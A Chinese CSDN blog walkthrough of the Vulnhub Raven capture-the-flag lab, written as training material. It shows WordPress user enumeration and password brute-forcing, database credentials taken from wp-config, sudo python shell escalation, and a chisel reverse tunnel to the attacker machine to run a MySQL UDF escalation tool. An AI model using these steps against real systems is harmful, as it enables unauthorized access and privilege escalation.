[Vulnhub] Raven WordPress+SUDO-Python权限提升+MSQP自动化Mysql权限提升

最新推荐文章于 2024-11-05 15:28:12 发布
最新推荐文章于 2024-11-05 15:28:12 发布
阅读量267 收藏 4
点赞数 6
分类专栏: Vulnhub 文章标签: python 自动化 mysql
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/140701401
版权

信息收集

IP AddressOpening Ports
192.168.101.159TCP:

$ nmap -p- 192.168.101.159 --min-rate 1000 -sC -sV 

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 26:81:c1:f3:5e:01:ef:93:49:3d:91:1e:ae:8b:3c:fc (DSA)
|   2048 31:58:01:19:4d:a2:80:a6:b9:0d:40:98:1c:97:aa:53 (RSA)
|   256 1f:77:31:19:de:b0:e1:6d:ca:77:07:76:84:d3:a9:a0 (ECDSA)
|_  256 0e:85:71:a8:a2:c3:08:69:9c:91:c0:3f:84:18:df:ae (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: Raven Security
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          37755/udp6  status
|   100024  1          46017/tcp6  status
|   100024  1          52049/udp   status
|_  100024  1          60004/tcp   status
60004/tcp open  status  1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

本地权限

http://192.168.101.159/

image.png

$ dirb http://192.168.101.159

image-1.png

image-2.png

# echo '192.168.101.159 raven.local'>>/etc/hosts

image-3.png

$ wpscan --url http://raven.local/wordpress --enumerate u

usernames:michael,steven

image-4.png

$ wpscan --url http://raven.local/wordpress --usernames michael,steven --passwords /usr/share/wordlists/rockyou.txt

image-5.png

Username: steven, Password: pink84

$ ssh steven@192.168.101.159

image-6.png

Flag 1

$ cat /var/www/html/service.html

image-11.png

flag1{b9bbcb33e11b80be759c4e844862482d}

Flag 2

$ cat /var/www/flag2.txt

image-9.png

flag2{fc3fd58dcdad9ab23faca6e9a36e581c}

Flag 3

$ cat /var/www/html/wordpress/wp-config.php

image-12.png

username:root
password:R@v3nSecurity

$ mysql -uroot -p
mysql> use wordpress
mysql> select * from wp_posts\G;

image-13.png

flag3{afc01ab56b50591e7dccf93122770cd2}

权限提升

SUDO

$ sudo -l

image-7.png

$ sudo /usr/bin/python -c 'import pty;pty.spawn("/bin/bash")'

image-8.png

MYSQL:UDF:MSQP

利用MSQP检测权限提升

$ git clone https://github.com/MartinxMax/MSQP.git

$ python3 -m pip install mysql-connector-python

$ cd MSQP

首先kali开放服务端:

$ ./chisel server -p 8000 --reverse

image-14.png

启动客户端:

(target)$ ./chisel client 192.168.101.128:8000 R:localhost:3306

image-15.png

$ python3 msqp.py 127.0.0.1 3306 root R@v3nSecurity 192.168.101.128 100

image-16.png

Flag4

root@Raven:~# cat /root/flag4.txt

image-10.png

flag4{715dea6c055b9fe3337544932f2941ce}

Мартин.
关注
专栏目录
vulnhub-raven_2-linux-udf提权
MIs_Jiangyaomin的博客
05-31 269
端口扫描:nmap -sS -sV -A -p 1-62235 192.168.136.144目录扫描:phpmailer版本。
raven-pythonRaven是Sentry(getsentry.com)的旧版Python客户端-已由sentry-python取代
02-04
1. **错误捕获**:Raven-Python库能够自动或手动捕获Python应用中的异常,并将它们发送到Sentry服务器进行记录和分析。 2. **上下文信息**:Raven-Python允许开发者传递有关错误发生时的上下文信息,如用户ID、请求...
[Vulnhub] Raven2 PHPMailer-RCE+MSQP:Mysql权限提升
07-26 485
#PHPMailer-RCE #MSQP:Mysql权限提升
[Vulnhub] Raven-2 (mysql-UDF提权)
weixin_63231007的博客
07-16 758
再次mysql-uroot-pR@v3nSecurity登入mysql,首先我们应该创建一个表,如何再创建一个任务,创建任务之后再调用这个.so,最终再调用.so其中的一个命令这个命令会生成一个可执行的文件输入一句话输入反弹shell命令,最终我们执行完这个命令后就获得root权限。有四个flag要捕获。1vxyz表里成功插入二进制数据,然后利用dumpfile函数把文件导出,outfile多行导出,dumpfile一行导出,outfile会有特殊的转换,而dunpfile是原数据导出!...
VulnHub-Raven
热门推荐
江左盟的博客
04-06 1万+
信息收集 使用nmap --min-rate 10000 -A 192.168.58.135 --script=vuln扫描目标主机,如图: 部分关键信息如下: Nmap scan report for 192.168.58.135 Host is up (0.00054s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8
No.3-VulnHub-Raven: 2-Walkthrough渗透学习
qq_34801745的博客
12-29 2093
** VulnHub-Raven: 2-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/goldeneye-1,240/ 靶机难度:中等(CTF) 靶机发布日期:2018年5月4日 靶机描述:Raven:2是中级boot2root VM。有四个要捕获的标志。在多次破坏之后,Raven Security采取了额外的措施来加固其Web服务器,以防止黑...
3-VulnHub-Raven 2
尼德霍格007
07-08 370
VulnHub-Raven: 2 靶机地址:https://www.vulnhub.com/entry/raven-2,269/ 目标:找到四个flag.txt信息 作者:尼德霍格007 时间:2021-7-8 准备工作:kali虚拟机(NAT),raven2虚拟机(NAT) 一、信息收集 首先要确定目标机IP地址,nmap扫描 $ nmap -sP 192.168.21.0/24 之后查看开放端口,全端口扫描 可以看到目标机开放了22端口(SSH),80端口(HTTP)和两个其他端口(我不知道是干嘛
Vulnhub系列】Vulnhub_Raven2靶场渗透(原创)
Lusen的博客
07-28 1934
Vulnhub系列-Raven2靶场做题记录
权限提升】Linux系统&环境变量&定时任务&权限配置不当&MDUT自动化
今天是几号的博客
03-03 1119
Linux-环境变量文件配合SUID-本地 Linux-定时任务打包配合SUID-本地 Linux-定时任务文件权限配置不当-WEB&本地 Linux-第三方软件MYSQL数据库提权-WEB&本地 利用phpmailer漏洞进行修改并反弹 1、无法外联走隧道-MDUT自动化数据库提权 2、利用Mysql提权 searchsploit-手工提权
第104天:权限提升-Linux系统&环境变量&定时任务&权限配置不当&MDUT自动化
qq_46081990的博客
06-22 588
知识点总结 #知识点: 1、Linux提权-定时任务 2、Linux提权-环境变量 3、Linux提权-权限配置不当 4、Linux提权-数据库自动化 #系列内容: 内核,数据库,第三方服务,SUID&GUID,定时任务,环境变量,SUDO权限不当等 脏牛漏洞(CVE-2016-5195) Dirty Pipe(CVE-2022-0847) SUDO(CVE-2021-3156) Polkit(CVE-2021-4034) #截至目前思路点总结如下: 1.提权方法有部分适用在不同环境,当然也有
Python库 | raven-python-lambda-0.1.5.tar.gz
03-10
"Python库 | raven-python-lambda-0.1.5.tar.gz" 是一个与Python相关的压缩包文件,其中包含了名为 "raven-python-lambda-0.1.5" 的库的源代码。这个库是专门为在AWS Lambda环境中使用Python开发应用程序而设计的。...
Python库 | raven_python-1.0.0-py3-none-any.whl
02-27
python库。 资源全名:raven_python-1.0.0-py3-none-any.whl
raven-for-redux:用于Redux的Raven中间件
02-05
Sentry现在建议使用其新的SDK @sentry/browser而不是Raven。 请查看 ,以获取支持新SDK的该库的API兼容分支! 用于Redux的Raven中间件 注意:需要Raven> = 3.9.0。 Raven 3.14.0有此库触发 将每个调度动作的类型记录...
自助餐剩余食品识别图像分割系统:教学内容全覆盖
sgcsdn99的博客
11-04 1352
数据集信息展示在本研究中,我们使用的数据集名为“9_5_Merged”,该数据集专门用于训练改进YOLOv8-seg的自助餐剩余食品识别图像分割系统。该数据集包含71个类别,涵盖了丰富多样的食品种类,旨在提高模型对不同类型剩余食品的识别和分割能力。通过对这些类别的细致划分,我们希望能够实现更高精度的图像分割,进而优化自助餐剩余食品的管理和利用。
【anaconda】使用记录
最新发布
zhuyan108的博客
11-05 284
window11 下安装anaconda。
探索 Python 的新天地:Helium 库揭秘
AIGC搞起
11-04 792
自动化测试和网页交互的领域,Selenium 是一个强大的工具,但它的复杂性和陡峭的学习曲线让许多开发者望而却步。Helium库的出现,以其简洁的 API 和易用性,为 Python 开发者提供了一个新的选择。它不仅简化了 Selenium 的使用,还自带 WebDriver,减少了配置的复杂性。Helium 以其简洁的 API 和易用性,为 Python 开发者提供了一个强大的 Selenium 替代方案。它不仅减少了代码量,还简化了 WebDriver 的管理,使得自动化测试和网页交互变得更加容易。
01_IAR新建CC2530工程
nanxl1的博客
11-02 1038
由于很多Zigbee商家提供的教程未有从零建立CC2530工程的讲解,可能会导致后面的开发中出现一些琐碎的问题。本文将以**LED流水灯**为例,从0到1用**IAR**建立CC2530工程。
Python小游戏21——拼图小游戏
cxh666888_的博客
11-05 983
如果图像大小不同,你需要调整tile_size和图像缩放代码。初始化Pygame:使用pygame.init()来初始化Pygame库,这是使用Pygame进行任何游戏开发的第一步。更新屏幕:使用pygame.display.flip()或pygame.display.update()来更新屏幕显示。调整图像大小:使用pygame.transform.scale()来调整图像的大小,以适应拼图游戏的需求。设置屏幕尺寸:使用pygame.display.set_mode()来设置游戏的屏幕尺寸和模式。
cleanfid库的fid使用,及其使用CLIP模型clip_vit_b_32计算FID
百年孤独百年的博客
11-02 964
这篇博客详细介绍了如何使用 cleanfid 库计算 Fréchet Inception Distance (FID),特别是利用 CLIP 模型 clip_vit_b_32 计算 FID 分数来评估生成图像的质量。内容涵盖了 FID 的概念和原理、cleanfid 库的安装与配置、从缓存中加载与手动加载模型的方法,以及解决可能遇到的依赖问题。通过这篇教程,可以掌握使用 cleanfid 库计算fid的完整流程,并能够解决服务器环境中遇到的联网与模型下载问题。
Pythonraven-python-lambda的压缩包解析
Python的设计哲学强调代码的简洁性和易读性,使得Python成为初学者学习编程的首选语言,同时也被广泛应用于科学计算、人工智能、网络爬虫、Web开发、数据分析、自动化脚本等众多领域。Python的开源特性也使得它拥有...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值